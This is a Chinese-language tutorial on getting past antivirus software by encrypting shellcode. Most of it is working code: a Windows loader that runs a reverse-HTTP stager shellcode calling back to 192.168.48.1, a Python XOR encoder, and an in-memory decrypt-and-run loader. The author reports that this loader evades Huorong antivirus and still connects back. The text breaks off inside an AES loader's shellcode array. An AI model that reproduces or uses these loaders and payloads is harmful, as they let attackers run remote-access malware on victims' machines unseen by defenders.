前言

shellcode加密是shellcode混淆的一種手段。shellcode混淆手段有多種：加密（編碼）、偏移量混淆、UUID混淆、IPv4混淆、MAC混淆等。

隨著殺毒軟件的不斷進化，其檢測方式早已超越傳統的靜態特征分析。現代殺軟往往會在受控的虛擬環境中執行可疑文件，并通過掛鉤（hook）方式攔截并跟蹤 API 調用，以此判斷程序行為是否合法。更先進的產品（例如卡巴斯基）甚至具備內存掃描能力，這使得 shellcode 在內存中一旦被解密后就可能立即暴露，顯著增加了免殺的復雜度。

在這種背景下，單純依靠 shellcode 混淆已難以完全繞過所有檢測機制。然而，這并不意味著混淆技術已經失效。相反，在整個免殺流程中，靜態免殺始終是第一道門檻。只有先規避靜態檢測，后續的沙箱對抗、動態行為規避、內存防護等策略才有實施的空間。因此，shellcode 的混淆技術在靜態免殺中仍然占據極其重要的地位，是免殺體系中不可或缺的一環。

在掌握了混淆技術后，再進一步結合動態免殺手段，才能更高效地規避當前主流殺軟的綜合防御體系，從而提升整體的免殺成功率。

shellcode加密類型

Shellcode 加密是指將原始的 shellcode 使用某種加密算法（如 XOR、AES、RC4 等）處理，使其內容看起來不像惡意代碼，隱藏真實指令內容，是為了對抗殺軟檢測，尤其是靜態查殺、行為分析、特征提取等機制。?

下面是一些高效實用的加密類型（按免殺實戰效果排序）：

加密類型	是否實用	應用場景	特點說明
XOR（變種）	??????	Shellcode、字符串加密	簡單快速，易變種，適合動態解密
AES（ECB/CBC）	?????	Beacon配置、Payload保護	安全性高，但需要合理解密方式隱藏行為
RC4/RC4Drop	????	內存數據、模塊通信	加密速度快，行為輕量，適合網絡數據隱藏
Base64/Base32	??	僅限掩蓋敏感字段	非加密，只是編碼，極易被識別
Custom算法（自定義加密）	??????	內嵌Payload、解密Stub	殺軟無簽名，抗分析性強
Curve25519 + ChaCha20	????	高級C2通信（如Sliver）	通信層加密，偏向安全防竊聽
Shikata Ga Nai / polymorphic encoder	????	Shellcode編碼	可變性強，但被大量簽名收錄，需變種

實現過程

1、生成shellcode

2、把shellcode加密

3、構造shellcode加載器：把剛才加密后的shellcode解密并加載執行

4、編譯exe

XOR異或加密

1、首先寫一個以創建線程的方式加載shellcode的加載器

#include <windows.h>int main() {// Shellcode 以 unsigned char 數組形式存儲unsigned char shellcode[] = "\xfc\x48\x83\xe4\xf0\xe8\xc8\x00\x00\x00\x41\x51\x41\x50\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48\x01\xd0\x66\x81\x78\x18\x0b\x02\x75\x72\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48\x8b\x12\xe9\x4f\xff\xff\xff\x5d\x6a\x00\x49\xbe\x77\x69\x6e\x69\x6e\x65\x74\x00\x41\x56\x49\x89\xe6\x4c\x89\xf1\x41\xba\x4c\x77\x26\x07\xff\xd5\x48\x31\xc9\x48\x31\xd2\x4d\x31\xc0\x4d\x31\xc9\x41\x50\x41\x50\x41\xba\x3a\x56\x79\xa7\xff\xd5\xeb\x73\x5a\x48\x89\xc1\x41\xb8\x5d\x11\x00\x00\x4d\x31\xc9\x41\x51\x41\x51\x6a\x03\x41\x51\x41\xba\x57\x89\x9f\xc6\xff\xd5\xeb\x59\x5b\x48\x89\xc1\x48\x31\xd2\x49\x89\xd8\x4d\x31\xc9\x52\x68\x00\x02\x40\x84\x52\x52\x41\xba\xeb\x55\x2e\x3b\xff\xd5\x48\x89\xc6\x48\x83\xc3\x50\x6a\x0a\x5f\x48\x89\xf1\x48\x89\xda\x49\xc7\xc0\xff\xff\xff\xff\x4d\x31\xc9\x52\x52\x41\xba\x2d\x06\x18\x7b\xff\xd5\x85\xc0\x0f\x85\x9d\x01\x00\x00\x48\xff\xcf\x0f\x84\x8c\x01\x00\x00\xeb\xd3\xe9\xe4\x01\x00\x00\xe8\xa2\xff\xff\xff\x2f\x64\x33\x64\x62\x00\xf5\x94\xfa\xd2\xee\x16\xe8\xb9\xf9\x8f\x0f\x9f\xc3\xe9\x41\x35\xe7\x40\xc2\x70\xc2\x50\x6f\xee\xc6\x0a\xf5\xb7\x6f\x6c\x82\xd1\x2d\x49\x14\x72\xb9\x8b\xf7\xa7\xc5\x43\x17\x2d\x96\x3c\x97\x61\x77\x35\xd4\xad\x07\xc1\x1b\xae\x6e\x7b\x04\x8f\x16\x7c\x45\x75\x41\xaf\x52\x36\x8b\x30\x64\xef\x12\x00\x55\x73\x65\x72\x2d\x41\x67\x65\x6e\x74\x3a\x20\x4d\x6f\x7a\x69\x6c\x6c\x61\x2f\x35\x2e\x30\x20\x28\x63\x6f\x6d\x70\x61\x74\x69\x62\x6c\x65\x3b\x20\x4d\x53\x49\x45\x20\x39\x2e\x30\x3b\x20\x57\x69\x6e\x64\x6f\x77\x73\x20\x4e\x54\x20\x36\x2e\x31\x3b\x20\x54\x72\x69\x64\x65\x6e\x74\x2f\x35\x2e\x30\x29\x20\x4c\x42\x42\x52\x4f\x57\x53\x45\x52\x0d\x0a\x00\xd8\x1d\x49\xcd\x7c\x67\xd4\x35\x0a\xcd\x0b\x6f\x43\xb8\x2d\x58\x61\xd6\x49\x96\xe8\x8a\xc9\x00\xd6\x78\xbd\xce\x7e\xe8\xe6\xd3\x0c\x4f\xe3\x8a\xcc\x11\x7b\x4e\x34\xfd\x8d\xa4\xf0\xde\x80\x20\x4a\x98\x17\x3a\xd2\xa4\x8a\x68\xce\x78\xa7\xb6\xd7\x46\x52\x70\x9e\x6a\xf9\xcb\x62\xb9\xa7\xea\xaf\xd1\xfa\x0c\xb5\x89\x98\x3d\x58\xe4\x0c\x7f\xa0\x0e\xb9\x56\x42\x5c\x82\x89\xd9\x01\x94\xc2\x4c\xd9\x8b\x5b\x53\x9e\x33\x42\x2f\x4e\x21\xce\xb4\xa8\x0b\x14\x91\x95\x65\x8a\x4b\x68\xee\xe0\x90\xed\xc5\xa1\x85\x04\x89\x2e\xc0\xa0\x14\x94\xc1\x60\xb2\x3a\xa3\x36\x17\x6e\x0a\xe8\xa5\xc8\xe2\x9c\x42\xcd\x8a\x2e\xf5\xf6\xbb\x68\x34\x73\xf7\x9b\x69\x0c\xf5\x97\xc8\x4a\x4a\x59\x44\x63\x43\x2b\x91\xc9\xa0\x25\x41\xa2\xdf\x26\x98\xf9\x53\xbe\x1c\xc8\x6d\xe8\x24\x34\xd8\x9a\x72\x21\xf1\x57\xe2\x81\x9d\x35\x62\x0b\x91\x3f\x3d\xa5\x3e\x83\xb7\x60\x9a\x20\xd9\xb7\xa4\x69\x96\x00\x41\xbe\xf0\xb5\xa2\x56\xff\xd5\x48\x31\xc9\xba\x00\x00\x40\x00\x41\xb8\x00\x10\x00\x00\x41\xb9\x40\x00\x00\x00\x41\xba\x58\xa4\x53\xe5\xff\xd5\x48\x93\x53\x53\x48\x89\xe7\x48\x89\xf1\x48\x89\xda\x41\xb8\x00\x20\x00\x00\x49\x89\xf9\x41\xba\x12\x96\x89\xe2\xff\xd5\x48\x83\xc4\x20\x85\xc0\x74\xb6\x66\x8b\x07\x48\x01\xc3\x85\xc0\x75\xd7\x58\x58\x58\x48\x05\x00\x00\x00\x00\x50\xc3\xe8\x9f\xfd\xff\xff\x31\x39\x32\x2e\x31\x36\x38\x2e\x34\x38\x2e\x31\x00\x00\x0a\x2c\x2a";// 分配可執行內存LPVOID mem = VirtualAlloc(NULL, sizeof(shellcode), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);if (mem == NULL) {return 1;}// 復制 Shellcode 到分配的內存memcpy(mem, shellcode, sizeof(shellcode));// 創建線程執行 ShellcodeHANDLE thread = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)mem, NULL, 0, NULL);if (thread == NULL) {VirtualFree(mem, 0, MEM_RELEASE);return 1;}// 等待線程執行完成WaitForSingleObject(thread, INFINITE);// 清理CloseHandle(thread);VirtualFree(mem, 0, MEM_RELEASE);return 0;
}

測試，可以正常上線

編譯出來，火絨直接秒

2、進行XOR異或加密，密鑰是字符串“kun”

raw_shellcode = b"\xfc\x48\x83\xe4\xf0\xe8\xc8\x00\x00\x00\x41\x51\x41\x50\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48\x01\xd0\x66\x81\x78\x18\x0b\x02\x75\x72\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48\x8b\x12\xe9\x4f\xff\xff\xff\x5d\x6a\x00\x49\xbe\x77\x69\x6e\x69\x6e\x65\x74\x00\x41\x56\x49\x89\xe6\x4c\x89\xf1\x41\xba\x4c\x77\x26\x07\xff\xd5\x48\x31\xc9\x48\x31\xd2\x4d\x31\xc0\x4d\x31\xc9\x41\x50\x41\x50\x41\xba\x3a\x56\x79\xa7\xff\xd5\xeb\x73\x5a\x48\x89\xc1\x41\xb8\x5d\x11\x00\x00\x4d\x31\xc9\x41\x51\x41\x51\x6a\x03\x41\x51\x41\xba\x57\x89\x9f\xc6\xff\xd5\xeb\x59\x5b\x48\x89\xc1\x48\x31\xd2\x49\x89\xd8\x4d\x31\xc9\x52\x68\x00\x02\x40\x84\x52\x52\x41\xba\xeb\x55\x2e\x3b\xff\xd5\x48\x89\xc6\x48\x83\xc3\x50\x6a\x0a\x5f\x48\x89\xf1\x48\x89\xda\x49\xc7\xc0\xff\xff\xff\xff\x4d\x31\xc9\x52\x52\x41\xba\x2d\x06\x18\x7b\xff\xd5\x85\xc0\x0f\x85\x9d\x01\x00\x00\x48\xff\xcf\x0f\x84\x8c\x01\x00\x00\xeb\xd3\xe9\xe4\x01\x00\x00\xe8\xa2\xff\xff\xff\x2f\x64\x33\x64\x62\x00\xf5\x94\xfa\xd2\xee\x16\xe8\xb9\xf9\x8f\x0f\x9f\xc3\xe9\x41\x35\xe7\x40\xc2\x70\xc2\x50\x6f\xee\xc6\x0a\xf5\xb7\x6f\x6c\x82\xd1\x2d\x49\x14\x72\xb9\x8b\xf7\xa7\xc5\x43\x17\x2d\x96\x3c\x97\x61\x77\x35\xd4\xad\x07\xc1\x1b\xae\x6e\x7b\x04\x8f\x16\x7c\x45\x75\x41\xaf\x52\x36\x8b\x30\x64\xef\x12\x00\x55\x73\x65\x72\x2d\x41\x67\x65\x6e\x74\x3a\x20\x4d\x6f\x7a\x69\x6c\x6c\x61\x2f\x35\x2e\x30\x20\x28\x63\x6f\x6d\x70\x61\x74\x69\x62\x6c\x65\x3b\x20\x4d\x53\x49\x45\x20\x39\x2e\x30\x3b\x20\x57\x69\x6e\x64\x6f\x77\x73\x20\x4e\x54\x20\x36\x2e\x31\x3b\x20\x54\x72\x69\x64\x65\x6e\x74\x2f\x35\x2e\x30\x29\x20\x4c\x42\x42\x52\x4f\x57\x53\x45\x52\x0d\x0a\x00\xd8\x1d\x49\xcd\x7c\x67\xd4\x35\x0a\xcd\x0b\x6f\x43\xb8\x2d\x58\x61\xd6\x49\x96\xe8\x8a\xc9\x00\xd6\x78\xbd\xce\x7e\xe8\xe6\xd3\x0c\x4f\xe3\x8a\xcc\x11\x7b\x4e\x34\xfd\x8d\xa4\xf0\xde\x80\x20\x4a\x98\x17\x3a\xd2\xa4\x8a\x68\xce\x78\xa7\xb6\xd7\x46\x52\x70\x9e\x6a\xf9\xcb\x62\xb9\xa7\xea\xaf\xd1\xfa\x0c\xb5\x89\x98\x3d\x58\xe4\x0c\x7f\xa0\x0e\xb9\x56\x42\x5c\x82\x89\xd9\x01\x94\xc2\x4c\xd9\x8b\x5b\x53\x9e\x33\x42\x2f\x4e\x21\xce\xb4\xa8\x0b\x14\x91\x95\x65\x8a\x4b\x68\xee\xe0\x90\xed\xc5\xa1\x85\x04\x89\x2e\xc0\xa0\x14\x94\xc1\x60\xb2\x3a\xa3\x36\x17\x6e\x0a\xe8\xa5\xc8\xe2\x9c\x42\xcd\x8a\x2e\xf5\xf6\xbb\x68\x34\x73\xf7\x9b\x69\x0c\xf5\x97\xc8\x4a\x4a\x59\x44\x63\x43\x2b\x91\xc9\xa0\x25\x41\xa2\xdf\x26\x98\xf9\x53\xbe\x1c\xc8\x6d\xe8\x24\x34\xd8\x9a\x72\x21\xf1\x57\xe2\x81\x9d\x35\x62\x0b\x91\x3f\x3d\xa5\x3e\x83\xb7\x60\x9a\x20\xd9\xb7\xa4\x69\x96\x00\x41\xbe\xf0\xb5\xa2\x56\xff\xd5\x48\x31\xc9\xba\x00\x00\x40\x00\x41\xb8\x00\x10\x00\x00\x41\xb9\x40\x00\x00\x00\x41\xba\x58\xa4\x53\xe5\xff\xd5\x48\x93\x53\x53\x48\x89\xe7\x48\x89\xf1\x48\x89\xda\x41\xb8\x00\x20\x00\x00\x49\x89\xf9\x41\xba\x12\x96\x89\xe2\xff\xd5\x48\x83\xc4\x20\x85\xc0\x74\xb6\x66\x8b\x07\x48\x01\xc3\x85\xc0\x75\xd7\x58\x58\x58\x48\x05\x00\x00\x00\x00\x50\xc3\xe8\x9f\xfd\xff\xff\x31\x39\x32\x2e\x31\x36\x38\x2e\x34\x38\x2e\x31\x00\x00\x0a\x2c\x2a"
key = b"kun"
encoded = bytes([b ^ key[i % len(key)] for i, b in enumerate(raw_shellcode)])
print(", ".join(f"0x{b:02x}" for b in encoded))

加密后的shellcode

3、改造剛才的加載器，使其在內存中解密并執行shellcode

#include <windows.h>
#include <stdio.h>
#include <stdlib.h>// 使用字符串 "kun" 作為 XOR key
unsigned char xor_key[] = { 'k', 'u', 'n' };
const size_t key_len = sizeof(xor_key);// XOR混淆的 shellcode（請用你的真實 shellcode 替換）
unsigned char encoded_shellcode[] = { 
0x97, 0x3d, 0xed, 0x8f, 0x85, 0x86, 0xa3, 0x75, 0x6e, 0x6b, 0x34, 0x3f, 0x2a, 0x25, 0x3c, 0x3a, 0x23, 0x26, 0x5a, 0xa7, 0x0b, 0x23, 0xfe, 0x3c, 0x0b, 0x3d, 0xe5, 0x39, 0x6d, 0x26, 0xe0, 0x27, 0x4e, 0x23, 0xfe, 0x1c, 0x3b, 0x3d, 0x61, 0xdc, 0x3f, 0x24, 0x26, 0x44, 0xa7, 0x23, 0x44, 0xae, 0xc7, 0x49, 0x0f, 0x17, 0x77, 0x42, 0x4b, 0x34, 0xaf, 0xa2, 0x78, 0x2f, 0x6a, 0xb4, 0x8c, 0x86, 0x27, 0x2f, 0x3a, 0x3d, 0xe5, 0x39, 0x55, 0xe5, 0x29, 0x49, 0x26, 0x6a, 0xa5, 0x08, 0xea, 0x0d, 0x76, 0x60, 0x77, 0x1b, 0x19, 0xfe, 0xee, 0xe3, 0x75, 0x6e, 0x6b, 0x3d, 0xeb, 0xab, 0x01, 0x09, 0x23, 0x74, 0xbe, 0x3b, 0xfe, 0x26, 0x73, 0x31, 0xe5, 0x2b, 0x55, 0x27, 0x6a, 0xa5, 0x8d, 0x3d, 0x3d, 0x91, 0xa2, 0x34, 0xe5, 0x5f, 0xfd, 0x26, 0x6a, 0xa3, 0x23, 0x5a, 0xbc, 0x26, 0x5a, 0xb5, 0xc2, 0x2a, 0xb4, 0xa7, 0x66, 0x34, 0x6f, 0xaa, 0x4d, 0x8e, 0x1e, 0x84, 0x22, 0x68, 0x39, 0x4a, 0x63, 0x30, 0x57, 0xba, 0x00, 0xb6, 0x33, 0x31, 0xe5, 0x2b, 0x51, 0x27, 0x6a, 0xa5, 0x08, 0x2a, 0xfe, 0x62, 0x23, 0x31, 0xe5, 0x2b, 0x69, 0x27, 0x6a, 0xa5, 0x2f, 0xe0, 0x71, 0xe6, 0x23, 0x74, 0xbe, 0x2a, 0x2d, 0x2f, 0x33, 0x2b, 0x37, 0x31, 0x34, 0x36, 0x2a, 0x2c, 0x2f, 0x31, 0x3d, 0xed, 0x87, 0x55, 0x2f, 0x39, 0x8a, 0x8e, 0x33, 0x34, 0x37, 0x31, 0x3d, 0xe5, 0x79, 0x9c, 0x21, 0x94, 0x8a, 0x91, 0x36, 0x1f, 0x6e, 0x22, 0xcb, 0x19, 0x02, 0x1b, 0x07, 0x05, 0x10, 0x1a, 0x6b, 0x34, 0x38, 0x22, 0xfc, 0x88, 0x27, 0xfc, 0x9f, 0x2a, 0xcf, 0x22, 0x1c, 0x53, 0x69, 0x94, 0xa0, 0x26, 0x5a, 0xbc, 0x26, 0x5a, 0xa7, 0x23, 0x5a, 0xb5, 0x23, 0x5a, 0xbc, 0x2f, 0x3b, 0x34, 0x3e, 0x2a, 0xcf, 0x54, 0x3d, 0x0c, 0xc9, 0x94, 0xa0, 0x85, 0x18, 0x2f, 0x26, 0xe2, 0xb4, 0x2f, 0xd3, 0x28, 0x7f, 0x6b, 0x75, 0x23, 0x5a, 0xbc, 0x2f, 0x3a, 0x34, 0x3f, 0x01, 0x76, 0x2f, 0x3a, 0x34, 0xd4, 0x3c, 0xfc, 0xf1, 0xad, 0x8a, 0xbb, 0x80, 0x2c, 0x35, 0x23, 0xfc, 0xaf, 0x23, 0x44, 0xbc, 0x22, 0xfc, 0xb6, 0x26, 0x44, 0xa7, 0x39, 0x1d, 0x6e, 0x69, 0x35, 0xea, 0x39, 0x27, 0x2f, 0xd1, 0x9e, 0x3b, 0x45, 0x4e, 0x91, 0xbe, 0x3d, 0xe7, 0xad, 0x3d, 0xed, 0xa8, 0x25, 0x04, 0x61, 0x2a, 0x26, 0xe2, 0x84, 0x26, 0xe2, 0xaf, 0x27, 0xac, 0xb5, 0x91, 0x94, 0x8a, 0x91, 0x26, 0x44, 0xa7, 0x39, 0x27, 0x2f, 0xd1, 0x58, 0x68, 0x73, 0x0e, 0x91, 0xbe, 0xf0, 0xae, 0x64, 0xf0, 0xf3, 0x6a, 0x75, 0x6e, 0x23, 0x8a, 0xa1, 0x64, 0xf1, 0xe2, 0x6a, 0x75, 0x6e, 0x80, 0xa6, 0x87, 0x8f, 0x74, 0x6e, 0x6b, 0x9d, 0xcc, 0x94, 0x8a, 0x91, 0x44, 0x11, 0x5d, 0x0f, 0x17, 0x6e, 0x9e, 0xe1, 0x94, 0xb9, 0x9b, 0x78, 0x83, 0xcc, 0x97, 0xe4, 0x7a, 0xf1, 0xa8, 0x9c, 0x2f, 0x5e, 0x92, 0x2e, 0xa9, 0x05, 0xac, 0x3b, 0x1a, 0x80, 0xad, 0x7f, 0x9b, 0xdc, 0x1a, 0x02, 0xe9, 0xa4, 0x43, 0x22, 0x61, 0x1c, 0xd2, 0xfe, 0x99, 0xcc, 0xb0, 0x2d, 0x7c, 0x58, 0xf8, 0x57, 0xe2, 0x0f, 0x1c, 0x40, 0xba, 0xc6, 0x72, 0xaf, 0x70, 0xdb, 0x00, 0x10, 0x71, 0xe1, 0x7d, 0x09, 0x2b, 0x1e, 0x34, 0xc1, 0x39, 0x43, 0xe5, 0x5b, 0x11, 0x81, 0x79, 0x75, 0x3b, 0x18, 0x10, 0x1c, 0x46, 0x34, 0x09, 0x0e, 0x1b, 0x1a, 0x51, 0x55, 0x23, 0x04, 0x0f, 0x07, 0x07, 0x19, 0x0f, 0x44, 0x40, 0x40, 0x5b, 0x55, 0x46, 0x08, 0x1a, 0x03, 0x1b, 0x14, 0x1a, 0x02, 0x17, 0x02, 0x0e, 0x4e, 0x4e, 0x26, 0x26, 0x27, 0x2e, 0x55, 0x57, 0x45, 0x45, 0x55, 0x4b, 0x22, 0x07, 0x05, 0x11, 0x01, 0x1c, 0x06, 0x4e, 0x25, 0x21, 0x4e, 0x5d, 0x5b, 0x5f, 0x50, 0x55, 0x3a, 0x19, 0x1c, 0x0a, 0x0e, 0x1b, 0x1a, 0x44, 0x40, 0x40, 0x5b, 0x5c, 0x4e, 0x27, 0x37, 0x2c, 0x39, 0x3a, 0x39, 0x38, 0x30, 0x3c, 0x66, 0x7f, 0x6e, 0xb3, 0x68, 0x27, 0xa6, 0x09, 0x09, 0xbf, 0x40, 0x64, 0xa6, 0x7e, 0x01, 0x28, 0xcd, 0x43, 0x33, 0x14, 0xb8, 0x22, 0xe3, 0x86, 0xe1, 0xbc, 0x6e, 0xbd, 0x0d, 0xd3, 0xa5, 0x0b, 0x86, 0x8d, 0xa6, 0x62, 0x24, 0x96, 0xe4, 0xa7, 0x64, 0x15, 0x25, 0x41, 0x93, 0xe6, 0xd1, 0x9e, 0xb5, 0xf5, 0x4e, 0x21, 0xed, 0x79, 0x51, 0xa7, 0xca, 0xe1, 0x1d, 0xa0, 0x13, 0xd2, 0xd8, 0xbc, 0x33, 0x3c, 0x1b, 0xeb, 0x04, 0x92, 0xbe, 0x0c, 0xd2, 0xd2, 0x84, 0xc4, 0xa4, 0x94, 0x67, 0xc0, 0xe7, 0xf3, 0x48, 0x36, 0x8f, 0x79, 0x11, 0xcb, 0x7b, 0xd7, 0x3d, 0x37, 0x32, 0xe9, 0xfc, 0xb7, 0x6a, 0xe1, 0xac, 0x27, 0xac, 0xe5, 0x30, 0x26, 0xf0, 0x58, 0x37, 0x41, 0x25, 0x54, 0xa0, 0xdf, 0xdd, 0x65, 0x7f, 0xe4, 0xfb, 0x0e, 0xff, 0x25, 0x03, 0x9b, 0x8e, 0xfb, 0x98, 0xab, 0xca, 0xf0, 0x6a, 0xe2, 0x5b, 0xae, 0xcb, 0x61, 0xfa, 0xaa, 0x15, 0xdc, 0x51, 0xd6, 0x58, 0x7c, 0x1b, 0x64, 0x83, 0xd0, 0xa6, 0x89, 0xe9, 0x2c, 0xa6, 0xff, 0x40, 0x9e, 0x83, 0xd5, 0x03, 0x41, 0x1d, 0x9c, 0xee, 0x07, 0x67, 0x80, 0xf9, 0xa3, 0x3f, 0x24, 0x32, 0x31, 0x0d, 0x28, 0x5e, 0xff, 0xa2, 0xd5, 0x4b, 0x2a, 0xd7, 0xb1, 0x4d, 0xed, 0x97, 0x38, 0xcb, 0x72, 0xa3, 0x18, 0x86, 0x4f, 0x41, 0xb6, 0xf1, 0x07, 0x4f, 0x9a, 0x22, 0x8c, 0xea, 0xe8, 0x5b, 0x09, 0x7e, 0xff, 0x54, 0x48, 0xcb, 0x55, 0xf6, 0xd9, 0x0b, 0xef, 0x4e, 0xb2, 0xc2, 0xca, 0x02, 0xe3, 0x6e, 0x2a, 0xcb, 0x9e, 0xde, 0xd7, 0x38, 0x94, 0xa0, 0x26, 0x5a, 0xbc, 0xd4, 0x6b, 0x75, 0x2e, 0x6b, 0x34, 0xd6, 0x6b, 0x65, 0x6e, 0x6b, 0x34, 0xd7, 0x2b, 0x75, 0x6e, 0x6b, 0x34, 0xd4, 0x33, 0xd1, 0x3d, 0x8e, 0x8a, 0xbb, 0x23, 0xe6, 0x3d, 0x38, 0x3d, 0xe7, 0x8c, 0x3d, 0xe7, 0x9a, 0x3d, 0xe7, 0xb1, 0x34, 0xd6, 0x6b, 0x55, 0x6e, 0x6b, 0x3c, 0xe7, 0x92, 0x34, 0xd4, 0x79, 0xe3, 0xe7, 0x89, 0x8a, 0xbb, 0x23, 0xf6, 0xaa, 0x4b, 0xf0, 0xae, 0x1f, 0xc3, 0x08, 0xe0, 0x72, 0x26, 0x6a, 0xb6, 0xeb, 0xab, 0x00, 0xb9, 0x33, 0x2d, 0x36, 0x23, 0x70, 0x6e, 0x6b, 0x75, 0x6e, 0x3b, 0xb6, 0x86, 0xf4, 0x88, 0x91, 0x94, 0x44, 0x57, 0x59, 0x5b, 0x5f, 0x5d, 0x4d, 0x40, 0x5f, 0x4d, 0x40, 0x5a, 0x75, 0x6e, 0x61, 0x59, 0x44
};
size_t shellcode_len = sizeof(encoded_shellcode);int main() {// 申請 RWX 內存LPVOID exec_mem = VirtualAlloc(NULL, shellcode_len, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);if (!exec_mem) {printf("VirtualAlloc failed.\n");return -1;}// 復制加密的 shellcode 到可執行內存memcpy(exec_mem, encoded_shellcode, shellcode_len);// 在已加載的內存中解密 shellcodefor (size_t i = 0; i < shellcode_len; ++i) {((unsigned char*)exec_mem)[i] ^= xor_key[i % key_len];}// 創建線程執行 shellcodeHANDLE hThread = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)exec_mem, NULL, 0, NULL);if (!hThread) {printf("CreateThread failed.\n");VirtualFree(exec_mem, 0, MEM_RELEASE);return -1;}// 等待 shellcode 執行完成WaitForSingleObject(hThread, INFINITE);// 清理VirtualFree(exec_mem, 0, MEM_RELEASE);return 0;
}

注意！在改造加載器時，必須確保硬編碼在其中的 shellcode 是以加密形式存儲的。否則極易被殺軟掃描到明文特征。在正確的加載流程中，shellcode 的解密操作應在其寫入內存（通常使用 memcpy 或等效方式）之后進行；若在寫入前提前解密，等同于將明文代碼暴露在磁盤或可見內存中，這無異于“裸奔”。

運行測試，能上線，說明代碼沒問題

打包編譯出來，火絨不再查殺，可以正常上線！

AES加密

1、同樣，先寫一個加載器，這里使用回調函數執行shellcode

#include <windows.h>
#include <iostream>int main()
{unsigned char shellcode[] = "\xfc\x48\x83\xe4\xf0\xe8\xc8\x00\x00\x00\x41\x51\x41\x50\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48\x01\xd0\x66\x81\x78\x18\x0b\x02\x75\x72\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48\x8b\x12\xe9\x4f\xff\xff\xff\x5d\x6a\x00\x49\xbe\x77\x69\x6e\x69\x6e\x65\x74\x00\x41\x56\x49\x89\xe6\x4c\x89\xf1\x41\xba\x4c\x77\x26\x07\xff\xd5\x48\x31\xc9\x48\x31\xd2\x4d\x31\xc0\x4d\x31\xc9\x41\x50\x41\x50\x41\xba\x3a\x56\x79\xa7\xff\xd5\xeb\x73\x5a\x48\x89\xc1\x41\xb8\x5d\x11\x00\x00\x4d\x31\xc9\x41\x51\x41\x51\x6a\x03\x41\x51\x41\xba\x57\x89\x9f\xc6\xff\xd5\xeb\x59\x5b\x48\x89\xc1\x48\x31\xd2\x49\x89\xd8\x4d\x31\xc9\x52\x68\x00\x02\x40\x84\x52\x52\x41\xba\xeb\x55\x2e\x3b\xff\xd5\x48\x89\xc6\x48\x83\xc3\x50\x6a\x0a\x5f\x48\x89\xf1\x48\x89\xda\x49\xc7\xc0\xff\xff\xff\xff\x4d\x31\xc9\x52\x52\x41\xba\x2d\x06\x18\x7b\xff\xd5\x85\xc0\x0f\x85\x9d\x01\x00\x00\x48\xff\xcf\x0f\x84\x8c\x01\x00\x00\xeb\xd3\xe9\xe4\x01\x00\x00\xe8\xa2\xff\xff\xff\x2f\x64\x33\x64\x62\x00\xf5\x94\xfa\xd2\xee\x16\xe8\xb9\xf9\x8f\x0f\x9f\xc3\xe9\x41\x35\xe7\x40\xc2\x70\xc2\x50\x6f\xee\xc6\x0a\xf5\xb7\x6f\x6c\x82\xd1\x2d\x49\x14\x72\xb9\x8b\xf7\xa7\xc5\